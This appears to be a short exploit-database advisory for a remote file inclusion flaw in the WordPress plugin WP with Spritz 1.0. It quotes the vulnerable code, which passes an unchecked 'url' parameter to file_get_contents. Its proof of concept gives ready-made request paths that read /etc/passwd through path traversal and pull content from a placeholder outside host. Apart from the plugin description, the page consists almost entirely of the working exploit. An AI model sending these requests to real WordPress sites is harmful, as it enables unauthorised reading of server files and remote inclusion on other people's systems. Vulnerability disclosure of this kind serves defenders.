WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Authors:Wadeek               Risk:High

CVE:NO                      0day:Remote File Inclusion

0day -id:0DAY-176104         Date:2018-04-27

Overview

WP with Spritz lets your readers read more of your content quicker than ever using Spritz patented speed reading technology.

Enable your readers to read and retain your content like never before!

Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

POC

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Leave a Reply